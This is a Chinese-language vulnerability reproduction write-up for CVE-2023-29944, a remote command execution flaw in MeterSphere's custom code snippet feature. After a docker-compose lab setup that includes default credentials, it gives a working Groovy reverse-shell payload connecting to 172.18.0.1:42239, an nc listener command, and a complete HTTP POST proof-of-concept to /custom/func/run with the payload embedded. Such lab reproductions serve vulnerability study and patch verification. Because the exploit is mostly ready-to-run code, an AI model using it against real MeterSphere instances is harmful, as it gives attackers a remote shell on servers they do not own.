【漏洞复现】CVE-2023-29944 Expression Injection

漏洞信息

NVD - cve-2023-29944

Metersphere v1.20.20-lts-79d354a6 is vulnerable to Remote Command Execution. The system command reverse-shell can be executed at the custom code snippet function of the metersphere system workbench.

背景介绍

MeterSphere is an open-source, continuous testing platform widely used by developers and QA managers for test plan management, data-driven testing, and test reporting metrics. It is engineered to integrate seamlessly with a variety of development and CI/CD toolchains to enhance productivity in DevOps environments. The platform supports functional UI, performance, and API testing, aiming to optimize testing workflows. The primary users of MeterSphere are software development teams and testing specialists seeking to attain high-quality assurance in their product cycles. Its robust plug-in architecture allows it to be extended and customized for specific workflows and tool integrations, making it adaptable across different industry requirements.

主页：https://metersphere.io/

源码：https://github.com/metersphere/metersphere

环境搭建

docker-compose.yml：

version: "2.1"
services:web:image: vulhub/metersphere:1.15.4ports:- "8081:8081"- "5005:5005"environment:MYSQL_SERVER: db:3306MYSQL_DB: metersphereMYSQL_USERNAME: rootMYSQL_PASSWORD: rootKAFKA_SERVER: kafka:9092db:image: mysql:5.7command: --sql-mode="STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" --max-connections=8000environment:- MYSQL_ROOT_PASSWORD=root- MYSQL_DATABASE=meterspherekafka:image: bitnami/kafka:3.4.1environment:# KRaft settings- KAFKA_CFG_NODE_ID=0- KAFKA_CFG_PROCESS_ROLES=controller,broker- KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@kafka:9093# Listeners- KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,CONTROLLER://:9093- KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT://:9092- KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT- KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER- KAFKA_CFG_INTER_BROKER_LISTENER_NAME=PLAINTEXT

Web UI：http://127.0.0.1:8081

账号admin、密码metersphere

漏洞复现

参考：https://github.com/metersphere/metersphere/security/advisories/GHSA-5473-9v2g-rpqm

通过Web UI登录进入页面后，如下所示创建代码片段：

在这里插入图片描述

Payload using Groovy：

String host="172.18.0.1";int port=42239;String cmd="/bin/sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

开启想要反弹shell的终端，开启监听42239端口：

$ nc -lvnp 42239

填写Payload，并设置使用Groovy执行代码：

在这里插入图片描述

成功拿到shell：

在这里插入图片描述

POC：

POST /custom/func/run HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
CSRF-TOKEN: B+De+lLrLpRKpoEQ/DZ2WOaN0mpV94mVFEwtQUBbPSBTlBoh1ApgmHhxs8FTKhbyZ5WF51VDhpLCunYUswFa6w==
WORKSPACE_ID: abe94ec0-bded-11ef-a774-0242ac120004
PROJECT_ID: abe962dd-bded-11ef-a774-0242ac120004
Content-Length: 1399
Origin: http://127.0.0.1:8081
Connection: keep-alive
Referer: http://127.0.0.1:8081/
Cookie: MS_SESSION_ID=b258ff15-92fe-4f65-afa4-6cd078c64c61
{"id":"3608f369","testElement":{"id":"2b9a4424-3f58-4721-bb1e-4c5cd87a0ed1","type":"TestPlan","name":"TestPlan","enabled":true,"hashTree":[{"id":"75f5e26c-ee57-4840-8776-7fcb853d69a4","type":"ThreadGroup","name":"ThreadGroup","enabled":true,"onSampleError":true,"clazzName":"io.metersphere.api.dto.definition.request.MsThreadGroup","hashTree":[{"resourceId":"e95e5436-123f-44a7-850c-7fbd571a2d11","active":false,"type":"JSR223Processor","label":"","script":"String host=\"172.18.0.1\";int port=42239;String cmd=\"/bin/sh\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ","scriptLanguage":"beanshell","enable":true,"hashTree":[],"id":"c0b3c59c","projectId":"abe962dd-bded-11ef-a774-0242ac120004","clazzName":"io.metersphere.api.dto.definition.request.processors.MsJSR223Processor"}]}],"clazzName":"io.metersphere.api.dto.definition.request.MsTestPlan"},"projectId":"abe962dd-bded-11ef-a774-0242ac120004","environmentMap":null,"reportId":"3608f369"}